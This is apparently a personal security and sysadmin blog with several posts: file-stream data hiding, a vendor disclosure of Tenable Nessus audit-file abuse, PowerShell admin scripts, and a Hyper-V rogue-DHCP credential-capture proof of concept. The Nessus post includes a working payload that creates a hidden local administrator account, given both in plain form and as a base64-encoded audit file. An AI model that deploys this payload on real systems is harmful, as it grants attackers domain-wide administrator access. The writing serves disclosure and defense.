PDF Slides - https://wmfb.co/txt/SecOnion_DetectLab.pdf

Above are the slides that were presented at the Security Onion + Bsides Augusta conference on October 4th 2019.

Recorded talk on YouTube:  https://youtu.be/JOvWCQ-PHHY  

are an NTFS file system only capability to be able to add data onto an additional "Stream" of a file without altering the contents of the file itself, or modify it's hash value in anyway.  

First we are going to create a new file, and add some data into it.  This can be any type of file, or an already existing file as long as it resides on an NTFS partition.

Creating a new file, adding data, hashing the file:

Now you see by listing the streams on a particular file that it already has "$DATA".  This is normal and will be present on any file.  Lets add an additional stream, and data more data.

So as you can see from the above, we added 211 additional bytes onto the file.  But the hash remains the same.  

On NTFS you can store an unlimited number of streams, with an unlimited amount of data (at least that is available on the filesystem).

Some gotchas about this are you cannot transfer over most protocols like HTTP, HTTPS, SSH, etc.  It WILL work over SMB as long as both partitions are NTFS.

Linux Extended File attributes (XFA)

are supported on most Linux/Unix filesystem types.  However there are greater limitations on the amount of size of an extended attribute.  This is usually tied to the block size that partition was formatted with.  So lets say during installation the filesystem was formatted as Ext4 with a 4k block size, then we can only store 4k worth of data per attribute.  Same steps as above with ADS, just a little different execution.

Creating a new file, putting data in it, hashing it:

Next creating a new Extended File Attribute and adding data to it, and rehashing again seeing that it does not change.

And it's basically as simple as that.  Thanks for reading my simple ADS/XFA write up!  

Title: Abuse of Tenable Nessus/Security Center with Audit Files and Powershell.

Class: Exploit Delivery System/RBAC Bypass/Insider Abuse/Pivot Vector.

Signed PDF with Keybase PGP key

Wylie's PGPKey

Date Published: 2017-07-27

Last Update: 2017-06-22

Vendors contacted: Tenable Network Security - https://www.tenable.com

• 2016-12-05 - First notification sent by Wylie Bayes to Tenable Consultant Jack Daniel.
• 2016-12-07 - Acknowledgement of first notification received from Tenable team.
• 2017-01-04 - Sent follow up email for progress update to Tenable team.
• 2017-01-04 - Received update from Tenable stating two teams were working on the problem, with two possible solutions being explored.
• 2017-02-01 - Sent follow up email for progress update to Tenable team.
• 2017-02-01 - Received response and new .nbin file to test.
• 2017-02-02 - Tested .nbin file from Tenable but were still able to create local admins. Sent results back to Tenable team.
• 2017-02-03 - Received 2nd .nbin file for testing from Tenable team.
• 2017-02-06 - Tested 2nd .nbin file but were still able to create local admins. Sent results back to Tenable team.
• 2017-02-06 - Received request for example code / audit file from Tenable team to demonstrate how local admins were being created.
• 2017-02-06 - Provided the requested information to Tenable team.
• 2017-02-06 - Received 3rd .nbin file for testing from Tenable team.
• 2017-02-06 - Tested 3rd .nbin file and NO local admin was created. Success!
• 2017-02-06 - Requested release date, and plugin ID# of fix as soon as they had the information.
• 2017-02-06 - Received acknowledgement that the information would be sent as soon as it was known by Tenable team.
• 2017-02-13 - Received release plan information from Tenable team.
• 2017-02-13 - New plugin released. ==Plugin ID# 21156 , version 1.252. Published into update Feed! ==
• 2017-02-14 - Confirmed new plugin was published by Tenable team.
• 2017-02-15 - Received request from Tenable to not publish findings due to investigation of this issue, leading to other compliance scanning abuse. Specifically mentioned "Unix" compliance auditing being vulnerable as well.
• 2017-02-15 - Agreed to not disclose until other compliance abuse problems are fixed, and that a Tenable security advisory is published giving Wylie Bayes credit for the initial finding.
• 2017-03-14 - Sent follow up message to Brian Martin at Tenable. Received response but nothing useful. Extended to "3 month" estimate, vice previously stated 2 month estimate on 2/15, and stated he would follow up again at the "half way point."
• 2017-04-14 - Contacted Tenable again for an update. Did not receive any useful information.
• 2017-04-19 - Received update repeating prior information with nothing useful.
• 2017-05-03 - Sent email expressing my concerns of lack of transparency and lack progress updates. The estimated "3 month" timeline to fix "the unix side" is about to expire. (05/14/17)
• 2017-05-04 - Response from Tenable "Understood. Let me take this to someone higher up in the Dev chain and see if I can set a better sense of urgency on our side."
• 2017-05-05 - Follow up from Tenable that the issue was elevated to a "Sr. Director of Engineering" who at this point had not been involved at all.
• 2017-05-17 - Email from my Tenable POC stating as of this date he was no longer with Tenable and passed me off to their generic "vulnreport@tenable.com" address.
• 2017-05-17 - Sent email to generic address requesting new POC and more solid / transparent timeline.
• 2017-05-22 - Sent email stating if a new POC is not assigned and timeline not presented within 7 days of this email, the information will go public.
• 2017-06-13 - Made contact with another POC the "Senior Director Product Security" for Tenable.
• 2017-06-16 - Got confirmation from POC that the stance from Tenable is now to implement controls and issue warnings within their UI(user interface) to mitigate this capability and explain its seriousness to admins and users.
• 2017-06-22 - Disclosed to MDA(Missile Defense Agency) due to the serious nature of this unexpected system capability.
• 2017-07-27 - Published this write up.

Vulnerability Description:

This product abuse method utilizes credentials stored within Tenable Nessus scanners, or Security Centers to launch custom created Audit files. The custom audit files can then make changes on Windows(and others as disclosed by Tenable). The ability to upload custom audit files is given to the lowest level user by default, and the user must simply select and use credentials stored / shared with them.

Background:

Disclosed this as a product abuse problem due to Tenable's nessus_compliance_reference.pdf documentation specifically stating:

"This item uses the field powershell_args to specify the arguments that need to be supplied to powershell.exe. If the location of powershell.exe is not default, you must use the powershell_console_file keyword to specify the location. Currently only the “get-” cmdlets are supported."

For example:

get-hotfix | where-object {$_.hotfixid -ne 'File 1'} | select Description,HotFixID,InstalledBy | format-list"

After successfully completing scans that do various other things without the use of "get-" cmdlets, I concluded this documentation was incorrect, and was part of the disclosure to tenable.

Technical Description - Exploit Code/Concept

Custom Audit file / base64 encoded powershell strings.
Here is an example of how to create a Local Admin on a machine:

    $test =
    '
	$desc = "Admin added with Nessus Bitches"
	$password = "ThisPasswordisAwesome2016*"
	$username = "TestAdminNessus"
	$computername = $env:COMPUTERNAME   # place computername here for remote access
	$computer = [ADSI]"WinNT://$computername,computer"
	$user = $computer.Create("user", $username)
	$user.SetPassword($password)
    $user.Setinfo()
    $user.description = $desc
    $user.setinfo()
	$user.UserFlags = 65536
	$user.SetInfo()
	$group = [ADSI]("WinNT://$computername/administrators,group")
	$group.add("WinNT://$username,user")
    '

    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($test))
     CgAkAGQAZQBzAGMAIAA9ACAAIgBBAGQAbQBpAG4AIABhAGQAZABlAGQAIAB3AGkAdABoACAATgBlAHMAcwB1AHMAIABCAGkAdABjAGgAZQBzACIACgAkAHAAYQBzAHMAdwBvAHIAZAAgAD0AIAAiAFQAaABpAHMAUABhAHMAcwB3AG8AcgBkAGkAcwBBAHcAZQBzAG8AbQBlADIAMAAxADYAKgAiAAoAJAB1AHMAZQByAG4AYQBtAGUAIAA9ACAAIgBUAGUAcwB0AEEAZABtAGkAbgBOAGUAcwBzAHUAcwAiAAoAJABjAG8AbQBwAHUAdABlAHIAbgBhAG0AZQAgAD0AIAAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAIAAgACAAIwAgAHAAbABhAGMAZQAgAGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlACAAaABlAHIAZQAgAGYAbwByACAAcgBlAG0AbwB0AGUAIABhAGMAYwBlAHMAcwAKACQAYwBvAG0AcAB1AHQAZQByACAAPQAgAFsAQQBEAFMASQBdACIAVwBpAG4ATgBUADoALwAvACQAYwBvAG0AcAB1AHQAZQByAG4AYQBtAGUALABjAG8AbQBwAHUAdABlAHIAIgAKACQAdQBzAGUAcgAgAD0AIAAkAGMAbwBtAHAAdQB0AGUAcgAuAEMAcgBlAGEAdABlACgAIgB1AHMAZQByACIALAAgACQAdQBzAGUAcgBuAGEAbQBlACkACgAkAHUAcwBlAHIALgBTAGUAdABQAGEAcwBzAHcAbwByAGQAKAAkAHAAYQBzAHMAdwBvAHIAZAApAAoAJAB1AHMAZQByAC4AUwBlAHQAaQBuAGYAbwAoACkACgAkAHUAcwBlAHIALgBkAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAA9ACAAJABkAGUAcwBjAAoAJAB1AHMAZQByAC4AcwBlAHQAaQBuAGYAbwAoACkACgAkAHUAcwBlAHIALgBVAHMAZQByAEYAbABhAGcAcwAgAD0AIAA2ADUANQAzADYACgAkAHUAcwBlAHIALgBTAGUAdABJAG4AZgBvACgAKQAKACQAZwByAG8AdQBwACAAPQAgAFsAQQBEAFMASQBdACgAIgBXAGkAbgBOAFQAOgAvAC8AJABjAG8AbQBwAHUAdABlAHIAbgBhAG0AZQAvAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAcwAsAGcAcgBvAHUAcAAiACkACgAkAGcAcgBvAHUAcAAuAGEAZABkACgAIgBXAGkAbgBOAFQAOgAvAC8AJAB1AHMAZQByAG4AYQBtAGUALAB1AHMAZQByACIAKQAKAA==

test.audit file:

<check_type: "Windows" version:"2">
<group_policy: "Test">


<custom_item>
type: AUDIT_POWERSHELL
description:"Create Local Admin"
value_type: POLICY_TEXT
value_data: ""
powershell_args: "CgAkAGQAZQBzAGMAIAA9ACAAIgBBAGQAbQBpAG4AIABhAGQAZABlAGQAIAB3AGkAdABoACAATgBlAHMAcwB1AHMAIABCAGkAdABjAGgAZQBzACIACgAkAHAAYQBzAHMAdwBvAHIAZAAgAD0AIAAiAFQAaABpAHMAUABhAHMAcwB3AG8AcgBkAGkAcwBBAHcAZQBzAG8AbQBlADIAMAAxADYAKgAiAAoAJAB1AHMAZQByAG4AYQBtAGUAIAA9ACAAIgBUAGUAcwB0AEEAZABtAGkAbgBOAGUAcwBzAHUAcwAiAAoAJABjAG8AbQBwAHUAdABlAHIAbgBhAG0AZQAgAD0AIAAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAIAAgACAAIwAgAHAAbABhAGMAZQAgAGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlACAAaABlAHIAZQAgAGYAbwByACAAcgBlAG0AbwB0AGUAIABhAGMAYwBlAHMAcwAKACQAYwBvAG0AcAB1AHQAZQByACAAPQAgAFsAQQBEAFMASQBdACIAVwBpAG4ATgBUADoALwAvACQAYwBvAG0AcAB1AHQAZQByAG4AYQBtAGUALABjAG8AbQBwAHUAdABlAHIAIgAKACQAdQBzAGUAcgAgAD0AIAAkAGMAbwBtAHAAdQB0AGUAcgAuAEMAcgBlAGEAdABlACgAIgB1AHMAZQByACIALAAgACQAdQBzAGUAcgBuAGEAbQBlACkACgAkAHUAcwBlAHIALgBTAGUAdABQAGEAcwBzAHcAbwByAGQAKAAkAHAAYQBzAHMAdwBvAHIAZAApAAoAJAB1AHMAZQByAC4AUwBlAHQAaQBuAGYAbwAoACkACgAkAHUAcwBlAHIALgBkAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAA9ACAAJABkAGUAcwBjAAoAJAB1AHMAZQByAC4AcwBlAHQAaQBuAGYAbwAoACkACgAkAHUAcwBlAHIALgBVAHMAZQByAEYAbABhAGcAcwAgAD0AIAA2ADUANQAzADYACgAkAHUAcwBlAHIALgBTAGUAdABJAG4AZgBvACgAKQAKACQAZwByAG8AdQBwACAAPQAgAFsAQQBEAFMASQBdACgAIgBXAGkAbgBOAFQAOgAvAC8AJABjAG8AbQBwAHUAdABlAHIAbgBhAG0AZQAvAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAcwAsAGcAcgBvAHUAcAAiACkACgAkAGcAcgBvAHUAcAAuAGEAZABkACgAIgBXAGkAbgBOAFQAOgAvAC8AJAB1AHMAZQByAG4AYQBtAGUALAB1AHMAZQByACIAKQAKAA=="
ps_encoded_args : YES
only_show_cmd_output: YES
</custom_item>

• Uploading this into Nessus, or Tenable Security Center (with the proper licensing,) then attaching it to a scan policy allowed for use with credentials that were previously stored within, and then launch a scan to do your bidding.

• Able to execute any cmdlets(or WMI processes) against any domain joined machine, with Domain Admin (DA) rights stored within a Nessus scanner, or Security Center. (Any account type can be abused if it is stored/shared)

To take this a step further I have found that it is possible to reset the admin, or other account password from the CLI if you have root access to the machine on a Security Center. There is also a simple commandline script for Nessus as well. So any box that was compromised in another fashion, could have the accounts reset and the attacker could then login to your scanner or security center and have access to all the credentials stored within for use. In this scenario the attacker could go from having root on a single server, to having Domain Admin on an entire enterprise in a matter of minutes. Scary stuff.

The only portion of this I tested before disclosing was the Windows/Powershell (Custom Audit) compliance abuse I have outlined above. This finding lead Tenable to fix other issues with compliance scanning, such as Unix. I only take credit for the Windows/Powershell research, which has been fixed and confirmed. Due to Tenable's Lack of response and follow up after the POC for this finding left the company, I was forced to publish my findings after multiple emails to Tenable went unanswered. The entire process took over 6 months time as you can see from the timeline at the beginning of this publication.

Signed PDF with Keybase PGP

Wylie's PGPKey

function whois($site) {
    #Syntax:  whois google.com
    $web = New-WebServiceProxy ‘http://www.webservicex.net/whois.asmx?WSDL’
    $web.GetWhoIs("$($site)")
}

function rwhois($ip){
    #syntax:  whois 8.8.8.8
    $baseURL = 'http://whois.arin.net/rest'
    $url = "$baseUrl/ip/$ip"
    $r = Invoke-RestMethod  $url
    $r.net
}

Cheers!

So as everyone already knows there was a huge leak of data for months for websites who use Cloudflare services. To make my changing of passwords a bit easier, and more focused / targeted I put together a little setup to check all of my Lastpass saved sites for Cloudflare name servers.

First I exported my Lastpass information to a .txt format from their website export feature.

Then I used a quick and dirty parsing -replace feature of powershell to clean it up:

$newdata = (gc last_pass_sites.txt) -replace '^.*?https?://(.*?)/.*', '$1'
$newdata >> new_sites.txt

This wasn't perfect and i had to manually clean up about 4 or 5 sites that did not contain the trailing "/" on their website. But wasn't enough to make me want to tweak the code above. This is a quick method to check all these sites so I just manually fixed about 5 entries.

Next I performed a Whois against each of the sites, and spit out which sites that matched the word "CLOUDFLARE" in the whois data. Here is the code below:

function check-cloudflare{
$web = New-WebServiceProxy ‘http://www.webservicex.net/whois.asmx?WSDL’
$sites = get-content C:\users\forgo\Desktop\newsites.txt
foreach ($site in $sites){
	$sitewhois = $web.GetWhoIs("$($site)")
	if ($sitewhois -match "CLOUDFLARE"){
		write-host "!!!!!! $($site) Uses Cloudflare !!!!!!"
	}
}
}

The output looks like:

PS C:\users\forgo\Desktop> check-cloudflare
!!!!!! wallhaven.cc Uses Cloudflare !!!!!!
!!!!!! leenk.me Uses Cloudflare !!!!!!
!!!!!! nostarch.com Uses Cloudflare !!!!!!
!!!!!! experts-exchange.com Uses Cloudflare !!!!!!
!!!!!! pocketnow.com Uses Cloudflare !!!!!!

This allowed me to focus on websites that I know for a fact I have used, and have a saved password for in Lastpass. Obviously this is not a fix all solution but definitely helped me get these site passwords changed FIRST.

Cheers!

I spent about 10-15 minutes in the GUI trying to find how to kill or stop this task, unsuccessfully. The only option I could find was to right click on the active migration task, and click "cancel," which rendered ZERO results.

The task in the task list also shows that it was coming off my ESXi 46 host, but when checking manually with PowerCLI, 46 did not show any tasks associated with my problematic VM. This is why in the code below I pulled in get-vmhost into a variable, and then setup a loop to look for the VM name in the tasks lists on each host. This led me to show the destination host was "49" and actually had the tasks I was wanting to kill.

Below is how I solved the issue with Powershell / PowerCLI. It will prompt the user to enter 3 things.

• The vCenter where the task is stuck.
• The VM name.
• The Killtype you wish to apply to the task. "soft, hard, or force."

Here is the code snippit:

function killvm-tasks {
$viserver = $(read-host "Enter vCenter Server")
connect-viserver $viserver | out-null
$vname = $(read-host "Enter the VM name")
$killtype = $(read-host "Enter Killtype:  soft, hard, or force")
$hosts = get-vmhost
foreach ($box in $hosts){
	$vmhost = get-esxcli -vmhost $box.Name
	$processes = $vmhost.vm.process.list()
	foreach ($process in $processes){
	    if ($process.Displayname -eq $vname){
			$box
			$vmhost.vm.process.kill($killtype, $process.WorldID)
		}
	}
}
}

Cheers!

Just throwing up a quick note to say I switched my site to Ghost blogging platform. Am running wordpress/httpd side by side for my other peeps. SSL cert is up and operational. All the encryptions.

Microsoft has confirmed there is a mitigation already in place by going to settings for a VM go to Network Adapter -> Advanced Features -> DHCP Guard and enable it. "It is not disabled by default due to it being a performance impact"?

I personally powershell to just disable DHCP on the interface. Like: "Set-NetIpInterface -ifindex 2 -Dhcp Disabled, where ifindex 2" where ifindex is the "Internal" vSwitch type.

The goal of this article is to show proof of concept how a Hyper-V virtual machine with a configuration of two NICs, one internal, one external(with internet access) can lead to a compromise of a Microsoft Domain, and exfiltration of your companies data.

The setup:

1. Windows Server 2012 R2, 2016, or Windows 10 Host with Hyper-V.
2. VM Capable of doing DHCP server / NAT. (Tested OpenBSD and Windows Server 2016)
3. VPN service of some kind with compatibility to the VM. We used OpenVPN / private VPS.

The Scenario:
A new VM is deployed and handed over to a local administrator, or a VM is compromised from the outside and has this configuration. The VM is given two NICs. One on an external vSwitch giving it outbound internet access, and one connected to an internal switch giving it access to… whatever else it needs access to internally/privately.

Assuming the administrator has not made any modifications to the virtual network adapter that gets created on the host itself when creating the internal vSwitch type, and leaving it set to “Obtain Automatically” for DHCP / DNS settings.

On OpenBSD this was extremely easy. We setup a simple DHCP config to hand out addresses 192.168.10.100-200, statically assigning the internal interface as 192.168.10.1. We used 8.8.8.8, and 8.8.4.4 for DNS, but could easily install/configure our own DNS services to push to the clients as well. Setup sysctl for IPV4 forwarding, and applied a very simple pf.conf to handle the NAT. DHCP will give an address to the Hyper-V host on the virtual NIC it creates, and give the default route a metric of “15” to that route on Windows 10, “5” on Server 2012r2, and “10” on 2016 standard. Only on 2012r2 is this metric the same as the hosts normal default route. Eventually traffic did start flowing through the new dhcp pushed route, but did take a little longer.

On Windows Server 2016 we basically mimic’d this setup using 192.168.11.0/24 network. Installed DHCP and routing and remote access roles. Configured the DHCP server settings, and NAT through routing and remote access snap-ins. Then using powershell and a custom packaged version of OpenVPN client with certs and configs, pulled it down with powershell invoke-webrequest cmdlet. Installed and connected the VPN client to a VPS server in the Netherlands.

Once the VPN connection was active it modified the default route traffic of the VM to push all traffic through the VPN gateway. Verifying on the Hyper-V host that all traceroutes are hitting 192.168.11.1(Server2016 VM) first, then 10.69.69.1 (VPN gateway), then the next hop our of our VPS provider and onward to it’s destination across the internet. VM’s on the host were also affected by this route hijack.

To take it a step further, I stood up a Debian Wheezy box for the VPS, ported OpenVPN server config over it to it and got it working, tested all the above routing, and began installing tools. I stood up a Responder instance and started gathering data, as well as MITM and session hijacking attacks against traffic going through the Debian machine. I was able to capture windows logon credentials(NTLM) from the host / VM’s affected.

Still want to see how far down the rabbit hole this could go with more tools and attacks on the distant end. But this is the initial write up on the finding. As i continue testing I will update this article.

 function fix-servicepath {
 $hosts = get-content C:\Users\*****\Documents\WindowsPowershell\Servers.txt
      foreach ($box in $hosts) {
     $services = $null
     $services = get-wmiobject win32_service -computername $box
     foreach ($service in $services){
           $Displayname = $service.DisplayName
           if (($service.PathName -like "* *") -and ($service.Pathname -notlike '"*"*') -and ($service.PathName -like '*.exe')) {
         $box
         $service.PathName
         write-host "Changing Path to be quoted:"
         $NewPath = $service.Pathname
         $newservicepath = "`"$NewPath`""
         $service.change($Displayname,$newservicepath)
         write-host "Done."
         ;""
       }
     }
   }
 }

This relies on a few things first:
VMWare PowerCLI 5.5+
Netapp DataOnTap 4.0 modules
HP OA Powershell Cmdlets to function properly.

If you want to capture VM Snapshot alarms you must create an alarm in your vCenters called “VMSnapshot Running” . I personally set mine to if the snapshot is 2GB or larger, trigger the alarm.

You must export any credentials that are not fully integrated into your AD domain. I export $nacred, and $oacred with export-clixml, and then import those creds into the function upon load time. You would need to add a vCenter cred, and use -Credential $vccred (or whatever your variable is called) on the vmware piece if that is what your environment requires.

 function check-env {
 [System.Reflection.Assembly]::LoadWithPartialName("System.Diagnostics")
 $sw = new-object system.diagnostics.stopwatch
 $sw.Start()
 ############################################################
 #### Set all static variables. 
 $oas = "oa1" , "oa2", "oa3", "oa4", "oa5"
 $controllers = "filer1", "filer2", "filer3", "filer4"
 $viservers = "vc1", "vc2"
 $nacred = Import-clixml C:\users\user1\Documents\NACred.xml
 $oacred = import-clixml C:\users\user1\Documents\OACred.xml
 $nothing = ''
 $vms = $null
 #### Check all HP Enclosures, Fans, OAs, Interconnects, Power,  and Blade health. 
write-host "----- Checking all HP Onboard Administrators for alarms -----" -foregroundcolor "magenta" -backgroundcolor "black"
foreach ($oa in $oas){
	write-progress "Checking HP OnBoard Administrators:"
	; ""
	; ""
	$con = Connect-HPOA -OA $oa -Credential $oacred
	$health = Get-HPOAHealth $con
	$bladehealth = $health.bladehealth
	$fanhealth = $health.FanHealth
	$interconnecthealth = $health.InterconnectHealth
	$Powerhealth = $health.PowerSupplyHealth
	$OAhealth = $health.OnboardAdministratorHealth
	$messages = "Absent", "OK"
	### Check OA Blade Health
	foreach ($item in $bladehealth) {
		if ($item.Status -notin $messages) {
			write-host "$oa has not OK Blade status on Bay:" $item.bay -foregroundcolor "red" -backgroundcolor "black"
			$item.Status
			$item.CorrectiveAction ; "" ; ""
			$nothing = "something"
		} else {
			$nothing = ''
		}
	}
	if ($nothing -eq $null -or $nothing -eq '') {
			write-host "$oa has no active BLADE alarms or problems." -foregroundcolor "green" -backgroundcolor "black"
	} else {
		$whatever = "whatever"
	}
	### Check OA Fan Health
	foreach ($item in $fanhealth) {
		if ($item.Status -notin $messages) {
			write-host "$oa has not OK FAN status on Bay:" $item.bay -foregroundcolor "red" -backgroundcolor "black"
			$item.Status
			$item.CorrectiveAction ; "" ; ""
			$nothing = "something"
		} else {
			$nothing = ''
		}
	}
	if ($nothing -eq $null -or $nothing -eq '') {
			write-host "$oa has no active FAN alarms or problems." -foregroundcolor "green" -backgroundcolor "black"
	} else {
		$whatever = "whatever"
	}
	#### Check OA Interconnect Bay Health
	foreach ($item in $interconnecthealth) {
		if ($item.Status -notin $messages) {
			write-host "$oa has not OK Interconnect status on Bay:" $item.bay -foregroundcolor "red" -backgroundcolor "black"
			$item.Status
			$item.CorrectiveAction ; "" ; ""
			$nothing = "something"
		} else {
			$nothing = ''
		}
	}
	if ($nothing -eq $null -or $nothing -eq '') {
			write-host "$oa has no active INTERCONNECT BAY alarms or problems." -foregroundcolor "green" -backgroundcolor "black"
	} else {
		$whatever = "whatever"
	}
	### Check OA Power Supply Health
	foreach ($item in $powerhealth) {
		if ($item.Status -notin $messages) {
			write-host "$oa has not OK Power Supply status on Bay:" $item.bay -foregroundcolor "red" -backgroundcolor "black"
			$item.Status
			$item.CorrectiveAction ; "" ; ""
			$nothing = "something"
		} else {
			$nothing = ''
		}
	}
	if ($nothing -eq $null -or $nothing -eq '') {
			write-host "$oa has no active POWER SUPPLY alarms or problems." -foregroundcolor "green" -backgroundcolor "black"
	} else {
		$whatever = "whatever"
	}
	### Check Onboard Administrator Health
	foreach ($item in $OAhealth) {
		if ($item.Status -notin $messages) {
			write-host "$oa has NOT OK OA status on Bay:" $item.bay -foregroundcolor "red" -backgroundcolor "black"
			$item.Status
			$item.CorrectiveAction ; "" ; ""
			$nothing = "something"
		} else {
			$nothing = ''
		}
	}
	if ($nothing -eq $null -or $nothing -eq '') {
			write-host "$oa has no active OA bay alarms or problems." -foregroundcolor "green" -backgroundcolor "black"
	} else {
		$whatever = "whatever"
	}
}
"";
"";
#### Check NETAPP Controllers TDKP and KNMD for Failed Disks, disconnected fiber connections, and channel failures.
write-host "----- Checking all Netapp Filers for Failed Disks, Channel Failures, failed aggregates, and offline luns or volumes -----" -foregroundcolor "magenta" -backgroundcolor "black"
; ""
; ""
foreach ($controller in $controllers) {
	$nothing = ''
	write-progress "Checking NetAPP Controllers for Failed Disks, Channel Failures, failed aggregates, and offline luns or volumes: "
	Connect-NaController -Name $controller -Credential $nacred | out-null
	### Check for Failed Disks
	$disk = Get-NaDiskOwner | ? {$_.Failed -eq "True"} | ? {$_.Owner -eq $controller}
	$shelfstatus = Get-NaShelf | Get-NaShelfEnvironment | where-object {$_.IsShelfChannelFailure -eq 1}
	if ($disk -eq $null) {
		write-host $controller "Has No Failed Disks." -foregroundcolor "green" -backgroundcolor "black" 
	} else {
		write-host "The following controller $($controller) has failed disks:" -foregroundcolor "red" -backgroundcolor "black"
		$disk | Select-Object -Property Name, SerialNumber, Owner, OwnerId, Pool, Failed | Format-Table -Wrap -Autosize
		$diskdata = get-nadisk $disk.Name
		$diskdata | Select-Object -Property Name, Shelf, Bay, Status, PhysSpace, RPM, FW, Model, Pool, Aggregate | Format-Table -Wrap -Autosize
		$drivesize = $diskdata.PhysSpace
		$converted = $drivesize/1TB
		write-host "Failed Drive:" $disk.Name "Size is:" -foregroundcolor "red" -backgroundcolor "black"
		$rounded = [math]::round($converted,2)
		write-host $rounded"TB" -foregroundcolor "red" -backgroundcolor "black"
		; ""
	}
	### Check for Shelf Channel Failures
	if ($shelfstatus -eq $null) {
		write-host "$controller has no Shelf Channel failures." -foregroundcolor "green" -backgroundcolor "black"
	} else {
		write-host "$controller has the following Shelf Channel failures:" -foregroundcolor "red" -backgroundcolor "black"
		$shelfstatus
	}
	### Check if cluster partnering is enabled. 
	$cfstatus = get-nacluster
	if ($cfstatus.State -ne 'CONNECTED' -and $cfstatus.IsEnabled -ne $true){
		write-host "!!!!!!!!!!!!!!!!! Failover is not enabled on $($controller) and does not have a connected partner. !!!!!!!!!!!!!!!!!" -foregroundcolor "red" -backgroundcolor "black"
	}
	### Check for Failed aggregates, offline Volumes and Luns.
	$aggs = get-naaggr
	$vols = get-navol
	$luns = get-nalun
	foreach ($agg in $aggs){
		if ($agg.State -ne 'Online'){
			write-host "$($controller) has the following aggreates offline:"
			write-host "!!!!!!!!!!!!!!!!! $($agg.Name) IS OFFLINE !!!!!!!!!!!!!!!!!" -foregroundcolor "red" -backgroundcolor "black"
		}
	}
	foreach ($vol in $vols){
		if ($vol.State -ne 'Online'){
			write-host "$($controller) has the following Volumes offline:"
			write-host "!!!!!!!!!!!!!!!!! $($vol.Name) IS OFFLINE !!!!!!!!!!!!!!!!!" -foregroundcolor "red" -backgroundcolor "black"
		}
	}
	foreach ($lun in $luns){
		if ($lun.Online -ne $true){
			write-host "$($controller) has the following LUNs offline:"
			write-host "!!!!!!!!!!!!!!!!! $($Lun.Path) IS OFFLINE !!!!!!!!!!!!!!!!!" -foregroundcolor "red" -backgroundcolor "black"
		}
	}
	;""
}
; ""
; ""
##############################################################	
#### Check VMWare Clusters, Hosts, Datastores, and VM's for triggered Alarms and high value settings.
Add-PSSnapin Vmware.VIMAutomation.Core | Out-Null
set-PowerCLIConfiguration -invalidCertificateAction "ignore" -confirm:$false | out-null
write-host "----- Checking VMWare Hosts, Datastores, and VM alarms -----" -foregroundcolor "magenta" -backgroundcolor "black"	
foreach ($viserver in $viservers) {
	$vms = ''
	$vmwarehosts = ''
	$datastores = ''
	write-progress "Checking VMWare Clusters, Hosts, Datastores and VMs for Triggered Alarms: "
	; ""
	; ""
	connect-viserver $viserver | out-null
	#### Checking Cluster Settings HA/DRS.
	$clusters = ''
	$cluster = ''
	$clusters = get-cluster
	foreach ($cluster in $clusters){
		if ($cluster.HAEnabled -eq $false){
			write-host "!!!! $($viserver) - $($cluster.Name) does not have HA enabled !!!!" -foregroundcolor "red" -backgroundcolor "black"
		} else {
			write-host "$($viserver) - $($cluster.Name) has HA enabled" -foregroundcolor "green" -backgroundcolor "black"
		}
		if ($cluster.DRSAutomationLevel -notlike "*FullyAutomated*"){
			write-host "!!!! $($viserver) - $($cluster.Name) DRS is not fully automated !!!!" -foregroundcolor "red" -backgroundcolor "black"
		} else {
			write-host "$($viserver) - $($cluster.Name) DRS is fully automated" -foregroundcolor "green" -backgroundcolor "black"
		}
	}
	#### Checking Host alarms.
	$vmwarehosts = get-vmhost | get-view
	$alarm = ''
	$definition = ''
	foreach ($box in $vmwarehosts) {
		if ($box.TriggeredAlarmState -ne $null -or $box.TriggeredAlarmState -ne '') {
			$alarm = $box.TriggeredAlarmState.Alarm
			$definition = Get-AlarmDefinition -Id $alarm
			Write-host "$($box.Name) Has the following Host Alarms triggered:" -foregroundcolor "red" -backgroundcolor "black"
			Write-host $definition.Name -backgroundcolor "black" 
		}
	}
	if ($vmwarehosts.TriggeredAlarmState -eq $null -or $vmwarehosts.TriggeredAlarmState -eq '') {
			write-host "There are no active HOST alarms on:" $viserver -foregroundcolor "green" -backgroundcolor "black" 
	}
	#### Checking Datastore alarms.
	$datastores = get-datastore | get-view
	$alarm = ''
	$definition = ''
	foreach ($store in $datastores) {
		if ($store.TriggeredAlarmState -ne $null -or $store.TriggeredAlarmState -ne '') {
			$alarm = $store.TriggeredAlarmState.Alarm
			$definition = Get-AlarmDefinition -Id $alarm
			Write-host "$($store.Name) Has the following Storage Alarms triggered:" -foregroundcolor "red" -backgroundcolor "black"
			Write-host $definition.Name -backgroundcolor "black" 
		}
	}
	if ($datastores.TriggeredAlarmState -eq $null -or $datastores.TriggeredAlarmState -eq '') {
			write-host "There are no active DATASTORE alarms on:" $viserver -foregroundcolor "green" -backgroundcolor "black" 
	}
	#### Checking VM alarms and Snapshot dates. 
	$vms = get-vm | get-view
	$alarm = ''
	$definition = ''
	$snapdate = ''
	foreach ($vm in $vms) {
		if ($vm.TriggeredAlarmState -ne $null -or $vm.TriggeredAlarmState -ne '') {
			$alarm = $vm.TriggeredAlarmState.Alarm
			$definition = Get-AlarmDefinition -Id $alarm
			Write-host "$($vm.Name) Has the following VM alarms triggered:" -foregroundcolor "red" -backgroundcolor "black" 
			Write-host $definition.Name -backgroundcolor "black"
			#### If alarm is Snapshot, show Snapshot name and Creation Date.
			if ($definition.Name -eq "VMSnapshot Running") {
				$snapdate = get-snapshot -VM $vm.Name
				write-host "$($snapdate.Name) was created on:" $snapdate.Created -backgroundcolor "black"
				write-host "Snapshot is the following size in GB:" $snapdate.SizeGB -backgroundcolor "black"
				;""
			}
		}
	}
	if ($vms.TriggeredAlarmState -eq $null -or $vmview.TriggeredAlarmState -eq '') {
			write-host "There are no active VM alarms on" $viserver -foregroundcolor "green" -backgroundcolor "black" 

	}
	$vms = $null
	$vms = get-vm | where {$_.Name -like "*_old*" -or $_.Name -like "*_old*"} | out-null
	if ($vms -ne $null){
		write-host "The following VM's have old in their names:" -foregroundcolor "red" -backgroundcolor "black" 
		$vms.Name
		;""
	}
	$vms = $null
